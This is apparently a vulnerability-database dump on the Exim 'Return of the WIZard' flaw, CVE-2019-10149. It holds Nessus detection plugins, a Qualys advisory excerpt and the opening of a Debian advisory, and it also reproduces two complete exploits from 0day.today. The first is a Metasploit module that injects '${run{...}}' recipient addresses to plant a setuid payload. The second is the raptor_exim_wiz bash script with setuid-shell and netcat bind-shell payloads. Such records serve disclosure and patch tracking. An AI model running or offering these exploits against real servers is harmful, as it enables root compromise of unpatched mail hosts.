attribute:\"solution\",\n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-06T10:09:42", "description": "According to its banner, the version of Exim running on the remote\nhost is between 4.87 and 4.91 (inclusive). 
It is, therefore, potentially \naffected by a remote command execution vulnerability. A flaw exists\nin the deliver_message() function that could allow an attacker to execute\narbitrary commands via a specially crafted email.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-06T00:00:00", "title": "Exim 4.87 < 4.92 Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "cpe": ["cpe:/a:exim:exim"], "id": "EXIM_4_92.NASL", "href": "https://www.tenable.com/plugins/nessus/125737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125737);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_name(english:\"Exim 4.87 < 4.92 Remote Command Execution\");\n script_summary(english:\"Checks the version of the SMTP banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by a remote command \nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Exim running on the remote\nhost is between 4.87 and 4.91 (inclusive). It is, therefore, potentially \naffected by a remote command execution vulnerability. 
A flaw exists\nin the deliver_message() function that could allow an attacker to execute\narbitrary commands via a specially crafted email.\");\n # https://www.tenable.com/blog/cve-2019-10149-critical-remote-command-execution-vulnerability-discovered-in-exim\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16a2ac7f\");\n # https://www.openwall.com/lists/oss-security/2019/06/05/4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9de8f07f\");\n # https://www.openwall.com/lists/oss-security/2019/06/06/1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf324cac\");\n script_set_attribute(attribute:\"see_also\", value:\"https://exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"ftp://ftp.exim.org/pub/exim/exim4/ChangeLog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Exim 4.92 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nbanner = get_smtp_banner(port:port);\nif (!banner) audit(AUDIT_NO_BANNER, port);\nif (\"Exim\" >!< banner) audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nmatches = pregmatch(pattern:\"220.*Exim ([0-9\\._]+)\", string:banner);\nif (isnull(matches)) audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nversion = matches[1];\n# Underscore was added to the vesion\nversion = ereg_replace(string:version, pattern:'_', replace:'.');\n\nif (ver_compare(minver:'4.87', ver:version, fix:'4.92', strict:FALSE) < 0)\n{\n report =\n '\\n Banner : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 4.92';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'Exim', port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-06-09T10:14:11", "description": "Exploit for linux platform in category remote exploits", 
"edition": 1, "published": "2019-06-07T00:00:00", "title": "Exim 4.87 < 4.91 - (Local / Remote) Command Execution Exploit #RCE", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "1337DAY-ID-32848", "href": "https://0day.today/exploit/description/32848", "sourceData": "Qualys Security Advisory\r\n\r\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nLocal exploitation\r\nRemote exploitation\r\n- Non-default configurations\r\n- Default configuration\r\nAcknowledgments\r\nTimeline\r\n\r\n Boromir: \"What is this new devilry?\"\r\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\r\n -- The Lord of the Rings: The Fellowship of the Ring\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nDuring a code review of the latest changes in the Exim mail server\r\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\r\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\r\nRemote *Command* Execution, not Remote Code Execution: an attacker can\r\nexecute arbitrary commands with execv(), as root; no memory corruption\r\nor ROP (Return-Oriented Programming) is involved.\r\n\r\nThis vulnerability is exploitable instantly by a local attacker (and by\r\na remote attacker in certain non-default configurations). To remotely\r\nexploit this vulnerability in the default configuration, an attacker\r\nmust keep a connection to the vulnerable server open for 7 days (by\r\ntransmitting one byte every few minutes). 
However, because of the\r\nextreme complexity of Exim's code, we cannot guarantee that this\r\nexploitation method is unique; faster methods may exist.\r\n\r\nExim is vulnerable by default since version 4.87 (released on April 6,\r\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\r\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\r\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\r\n(released on February 10, 2019):\r\n\r\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\r\nhttps://bugs.exim.org/show_bug.cgi?id=2310\r\n\r\nbut was not identified as a security vulnerability, and most operating\r\nsystems are therefore affected. For example, we exploit an up-to-date\r\nDebian distribution (9.9) in this advisory.\r\n\r\n\r\n========================================================================\r\nLocal exploitation\r\n========================================================================\r\n\r\nThe vulnerable code is located in deliver_message():\r\n\r\n6122 #ifndef DISABLE_EVENT\r\n6123 if (process_recipients != RECIP_ACCEPT)\r\n6124 {\r\n6125 uschar * save_local = deliver_localpart;\r\n6126 const uschar * save_domain = deliver_domain;\r\n6127\r\n6128 deliver_localpart = expand_string(\r\n6129 string_sprintf(\"${local_part:%s}\", new->address));\r\n6130 deliver_domain = expand_string(\r\n6131 string_sprintf(\"${domain:%s}\", new->address));\r\n6132\r\n6133 (void) event_raise(event_action,\r\n6134 US\"msg:fail:internal\", new->message);\r\n6135\r\n6136 deliver_localpart = save_local;\r\n6137 deliver_domain = save_domain;\r\n6138 }\r\n6139 #endif\r\n\r\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\r\nexpansion item, and because new->address is the recipient of the mail\r\nthat is being delivered, a local attacker can simply send a mail to\r\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\r\nlocal_domains) and execute arbitrary commands, as 
root\r\n(deliver_drop_privilege is false, by default):\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nRemote exploitation\r\n========================================================================\r\n\r\nOur local-exploitation method does not work remotely, because the\r\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\r\nconfiguration requires the local part of the recipient's address (the\r\npart that precedes the @ sign) to be the name of a local user:\r\n\r\n[...]\r\n\r\n------------------------------------------------------------------------\r\nNon-default configurations\r\n------------------------------------------------------------------------\r\n\r\nWe eventually devised an elaborate method for exploiting Exim remotely\r\nin its default configuration, but we first identified various\r\nnon-default configurations that are easy to exploit remotely:\r\n\r\n- If the \"verify = recipient\" ACL was removed manually by an\r\n administrator (maybe to prevent username enumeration via RCPT TO),\r\n then our local-exploitation method also works remotely.\r\n\r\n- If Exim was configured to recognize tags in the local part of the\r\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\r\n then a remote attacker can simply reuse our local-exploitation method\r\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\r\n name of a local user).\r\n\r\n- If Exim was configured to relay mail to a remote domain, as a\r\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\r\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\r\n (where \"khazad.dum\" is one of Exim's relay_to_domains). 
Indeed, the\r\n \"verify = recipient\" ACL can only check the domain part of a remote\r\n address (the part that follows the @ sign), not the local part.\r\n\r\n------------------------------------------------------------------------\r\nDefault configuration\r\n------------------------------------------------------------------------\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n\r\nWe thank Exim's developers, Solar Designer, and the members of\r\n[email\u00a0protected]\r\n\r\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\r\nDEBUG vulnerabilities:\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\r\nhttps://seclists.org/bugtraq/1995/Feb/56\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\r\nhttp://www.cheswick.com/ches/papers/berferd.pdf\r\n\r\n\r\n========================================================================\r\nTimeline\r\n========================================================================\r\n\r\n2019-05-27: Advisory sent to [email\u00a0protected]\r\n\r\n2019-05-28: Advisory sent to [email\u00a0protected]\n\n# 0day.today [2019-06-09] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/32848"}, {"lastseen": "2019-12-04T03:56:25", "description": "This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). 
Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges.", "edition": 1, "published": "2019-08-24T00:00:00", "title": "Exim 4.87 / 4.91 - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-08-24T00:00:00", "id": "1337DAY-ID-33150", "href": "https://0day.today/exploit/description/33150", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'expect'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\r\n Improper validation of recipient address in deliver_message()\r\n function in /src/deliver.c may lead to command execution with root privileges\r\n (CVE-2019-10149).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Qualys', # Discovery and PoC (@qualys)\r\n 'Dennis Herrmann', # Working exploit (@dhn)\r\n 'Marco Ivaldi', # Working exploit (@0xdea)\r\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\r\n ],\r\n 'DisclosureDate' => '2019-06-05',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [\r\n 'Exim 4.87 - 4.91',\r\n lower_version: Gem::Version.new('4.87'),\r\n upper_version: Gem::Version.new('4.91')\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependSetgid' => true,\r\n 'PrependSetuid' => true\r\n },\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-10149' ],\r\n [ 'EDB', '46996' 
],\r\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\r\n ]\r\n ))\r\n\r\n register_options(\r\n [\r\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),\r\n OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def encode_command(cmd)\r\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\r\n end\r\n\r\n def open_tcp_connection\r\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\r\n params = Rex::Socket::Parameters.new({\r\n 'PeerHost' => '127.0.0.1',\r\n 'PeerPort' => datastore['EXIMPORT']\r\n })\r\n begin\r\n socket = socket_subsystem.create_tcp_client_channel(params)\r\n rescue => e\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n raise e\r\n end\r\n return socket_subsystem, socket\r\n end\r\n\r\n def inject_payload(payload)\r\n if session.type == 'meterpreter'\r\n socket_subsystem, socket = open_tcp_connection\r\n\r\n tcp_conversation = {\r\n nil => /220/,\r\n 'helo localhost' => /250/,\r\n \"MAIL FROM:<>\" => /250/,\r\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\r\n 'DATA' => /354/,\r\n 'Received:' => nil,\r\n '.' 
=> /250/\r\n }\r\n\r\n begin\r\n tcp_conversation.each do |line, pattern|\r\n Timeout.timeout(datastore['SendExpectTimeout']) do\r\n if line\r\n if line == 'Received:'\r\n for i in (1..31)\r\n socket.puts(\"#{line} #{i}\\n\")\r\n end\r\n else\r\n socket.puts(\"#{line}\\n\")\r\n end\r\n end\r\n if pattern\r\n socket.expect(pattern)\r\n end\r\n end\r\n end\r\n rescue Rex::ConnectionError => e\r\n fail_with(Failure::Unreachable, e.message)\r\n rescue Timeout::Error\r\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\r\n ensure\r\n socket.puts(\"QUIT\\n\")\r\n socket.close\r\n socket_subsystem.shutdown\r\n end\r\n else\r\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\r\n \"&& echo true\").chomp.to_s == 'true'\r\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\r\n end\r\n\r\n bash_script = %|\r\n #!/bin/bash\r\n\r\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in $(seq 1 30); do\r\n echo 'Received: $i' >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n |\r\n\r\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@bash_script_path, bash_script)\r\n register_file_for_cleanup(@bash_script_path)\r\n chmod(@bash_script_path)\r\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\r\n end\r\n\r\n print_status('Payload sent, wait a few seconds...')\r\n Rex.sleep(5)\r\n end\r\n\r\n def check_for_bash\r\n unless command_exists?('/bin/bash')\r\n fail_with(Failure::NotFound, 'bash not found')\r\n end\r\n end\r\n\r\n def on_new_session(session)\r\n super\r\n\r\n if session.type == 
'meterpreter'\r\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\r\n session.fs.file.rm(@payload_path)\r\n else\r\n session.shell_command_token(\"rm -f #{@payload_path}\")\r\n end\r\n end\r\n\r\n def check\r\n if session.type == 'meterpreter'\r\n begin\r\n socket_subsystem, socket = open_tcp_connection\r\n rescue\r\n return CheckCode::Safe\r\n end\r\n res = socket.gets\r\n socket.close\r\n socket_subsystem.shutdown\r\n else\r\n check_for_bash\r\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\r\n \"(read -u 3 && echo $REPLY) || echo false'\")\r\n if res == 'false'\r\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\r\n \"are you sure exim is listening on this port? (see EXIMPORT)\")\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n if res =~ /Exim ([0-9\\.]+)/i\r\n version = Gem::Version.new($1)\r\n vprint_status(\"Found exim version: #{version}\")\r\n if version >= target[:lower_version] && version <= target[:upper_version]\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.')\r\n end\r\n end\r\n\r\n unless writable?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\r\n end\r\n\r\n if nosuid?(base_dir)\r\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\r\n end\r\n\r\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\r\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\r\n 'to get root privileges.')\r\n end\r\n\r\n if session.type == 'shell'\r\n check_for_bash\r\n end\r\n\r\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\r\n write_file(@payload_path, payload.encoded_exe)\r\n register_file_for_cleanup(@payload_path)\r\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\r\n \"chmod 4755 #{@payload_path}'\"))\r\n\r\n unless setuid?(@payload_path)\r\n fail_with(Failure::Unknown, \"Couldn't escalate privileges\")\r\n end\r\n\r\n cmd_exec(\"#{@payload_path} & echo \")\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33150"}, {"lastseen": "2019-06-18T13:57:26", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-06-17T00:00:00", "title": "Exim 4.91 Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "1337DAY-ID-32869", "href": "https://0day.today/exploit/description/32869", "sourceData": "#!/bin/bash\r\n\r\n#\r\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\r\n# Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>\r\n#\r\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
\r\n# Improper validation of recipient address in deliver_message() \r\n# function in /src/deliver.c may lead to remote command execution.\r\n# (CVE-2019-10149)\r\n#\r\n# This is a local privilege escalation exploit for \"The Return \r\n# of the WIZard\" vulnerability reported by the Qualys Security \r\n# Advisory team.\r\n#\r\n# Credits:\r\n# Qualys Security Advisory team (kudos for your amazing research!)\r\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\r\n#\r\n# Usage (setuid method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m setuid\r\n# Preparing setuid shell helper...\r\n# Delivering setuid payload...\r\n# [...]\r\n# Waiting 5 seconds...\r\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\r\n# # id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Usage (netcat method):\r\n# $ id\r\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\r\n# $ ./raptor_exim_wiz -m netcat\r\n# Delivering netcat payload...\r\n# Waiting 5 seconds...\r\n# localhost [127.0.0.1] 31337 (?) 
open\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n#\r\n# Vulnerable platforms:\r\n# Exim 4.87 - 4.91\r\n#\r\n# Tested against:\r\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\r\n#\r\n\r\nMETHOD=\"setuid\" # default method\r\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\r\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\r\n\r\n# usage instructions\r\nfunction usage()\r\n{\r\n echo \"$0 [-m METHOD]\"\r\n echo\r\n echo \"-m setuid : use the setuid payload (default)\"\r\n echo \"-m netcat : use the netcat payload\"\r\n echo\r\n exit 1\r\n}\r\n\r\n# payload delivery\r\nfunction exploit()\r\n{\r\n # connect to localhost:25\r\n exec 3<>/dev/tcp/localhost/25\r\n\r\n # deliver the payload\r\n read -u 3 && echo $REPLY\r\n echo \"helo localhost\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"mail from:<>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"rcpt to:<$PAYLOAD>\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"data\" >&3\r\n read -u 3 && echo $REPLY\r\n for i in {1..31}\r\n do\r\n echo \"Received: $i\" >&3\r\n done\r\n echo \".\" >&3\r\n read -u 3 && echo $REPLY\r\n echo \"quit\" >&3\r\n read -u 3 && echo $REPLY\r\n}\r\n\r\n# print banner\r\necho\r\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\r\necho 'Copyright (c) 2019 Marco Ivaldi <[email\u00a0protected]>'\r\necho\r\n\r\n# parse command line\r\nwhile [ ! -z \"$1\" ]; do\r\n case $1 in\r\n -m) shift; METHOD=\"$1\"; shift;;\r\n * ) usage\r\n ;;\r\n esac\r\ndone\r\nif [ -z $METHOD ]; then\r\n usage\r\nfi\r\n\r\n# setuid method\r\nif [ $METHOD = \"setuid\" ]; then\r\n\r\n # prepare a setuid shell helper to circumvent bash checks\r\n echo \"Preparing setuid shell helper...\"\r\n echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\r\n gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\r\n if [ $? 
-ne 0 ]; then\r\n echo \"Problems compiling setuid shell helper, check your gcc.\"\r\n echo \"Falling back to the /bin/sh method.\"\r\n cp /bin/sh /tmp/pwned\r\n fi\r\n echo\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_SETUID\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n ls -l /tmp/pwned\r\n /tmp/pwned\r\n\r\n# netcat method\r\nelif [ $METHOD = \"netcat\" ]; then\r\n\r\n # select and deliver the payload\r\n echo \"Delivering $METHOD payload...\"\r\n PAYLOAD=$PAYLOAD_NETCAT\r\n exploit\r\n echo\r\n\r\n # wait for the magic to happen and spawn our shell\r\n echo \"Waiting 5 seconds...\"\r\n sleep 5\r\n nc -v 127.0.0.1 31337\r\n\r\n# print help\r\nelse\r\n usage\r\nfi\n\n# 0day.today [2019-06-18] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/32869"}], "debian": [{"lastseen": "2020-08-12T00:51:19", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4456-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 05, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2019-10149\n\nThe Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. 
